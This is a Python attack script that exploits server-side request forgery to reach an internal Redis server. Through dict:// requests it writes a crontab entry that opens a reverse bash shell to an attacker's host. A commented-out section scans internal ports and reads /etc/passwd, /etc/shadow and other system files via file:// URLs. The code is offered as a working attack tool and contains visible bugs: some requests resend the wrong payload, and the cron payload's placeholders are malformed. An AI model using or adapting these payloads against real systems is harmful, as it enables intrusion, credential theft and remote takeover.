def main(args):
url = args.url
redis_ip = args.redis_ip
bip = args.bip
bport = args.bport
logging.info("Starting to connect redis_ip and exec redis command.....")
#ubuntu /etc/crontab
#centos /var/spool/cront/root
#debain /var/spool/cron/crontabs/root
#set 0 "\n\n\n\n* * * * * /bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1\n\n\n\n"
payload1 = "http://{target}dict://{ip}:6379/set:0:\"\\x0a\\x0a*/1\\x20*\\x20*\\x20*\\x20*\\x20/bin/bash\\x20-i\\x20>\\x26\\x20/dev/tcp/{$bip}/{$bport}\\x200>\\x261\\x0a\\x0a\\x0a\ ".format(
target=url, ip=redis_ip, bip=bip, bport=bport)
r1 = requests.get(payload1).content
if r1:
print(r1)
#config set dir /etc
payload2 = "http://{target}dict://{ip}:6379/data=config:set:dir:/etc".format(
target=url, ip=redis_ip)
r2 = requests.get(payload2).content
if r2:
print(r2)
#config set dbfilename crontab
payload3 = "http://{target}dict://{ip}:6379/data=config:set:dbfilename:crontab".format(
target=url, ip=redis_ip)
r3 = requests.get(payload2).content
if r3:
print(r3)
#save
payload4 = "http://{target}dict://{ip}:6379/data=save".format(target=url,
ip=redis_ip)
r4 = requests.get(payload2).content
if r4:
print(r4)
'''
def _open_port(self, ip=''):
hash_judge = []
open_port = []
if ip:
pass
else:
ip = '127.0.0.1'
logging.info("Starting detect open ports in ip:{}.....".format(ip))
for port in self.ports:
hash_values = {}
payload = "{url}?{query}=dict://{ip}:{port}".format(
url=self.target, query=self.parameter, ip=ip, port=port)
#print(payload)
port_conn = get_requests(payload).text
if port_conn:
self.hash.update(port_conn.encode('utf-8'))
hash_values['port'] = port
hash_values['hash'] = self.hash.hexdigest()
hash_judge.append(hash_values)
else:
pass
#print(hash_judge)
hash_limit_value = self.hash_limit()
if hash_limit_value:
for i in hash_judge:
if hash_limit_value != i['hash']:
open_port.append(i['port'])
else:
for j in hash_judge:
open_port.append(j['port'])
return list(set(open_port))
def host_port(self):
while True:
if self.queue.empty():
break
try:
ip = self.queue.get_nowait()
ip_port = self._open_port(ip=ip)
if ip_port:
out_put(self.target, 'host_port.log', ip_port)
logging.info("the {} found open port is: {}".format(
self.ip, ip_port))
except requests.exceptions.ReadTimeout:
pass
except requests.exceptions.ConnectTimeout:
pass
except Exception as e:
break
def file_reader(target, parameter):
content = []
get_file = []
paths = [
'/etc/rsyslog.conf', '/etc/syslog.conf', '/etc/passwd', '/etc/shadow',
'/etc/group', '/etc/anacrontab', '/etc/networks', '/etc/hosts'
]
logging.info("Use the protocol to get the contents of the file.....")
for path in paths:
payload = "{url}?{query}=file://{path}".format(url=target,
query=parameter,
path=path)
file_content = get_requests(payload)
if file_content:
content.append(file_content.text.strip())
get_file.append(path)
else:
pass
if content:
logging.info("Save file content: {}".format(get_file))
out_put(target, 'file_content.log', list(set(content)))
def run(target, parameter, ip_c=''):
threads_count = 20
threads = []
Queue = queue.Queue()
open_port = Scan(target, parameter)._open_port()
out_put(target, 'host_port.log', open_port)
logging.info("127.0.0.1 host found open port is: {}".format(open_port))
if ip_c:
logging.info("Starting to detct the other ip ....")
for d in range(105, 106):
ip = '{0}.{1}'.format(ip_c, d)
Queue.put(ip)
for i in range(threads_count):
t = threading.Thread(
target=Scan(target, parameter, queue=Queue).host_port())
t.start()
t.join()
'''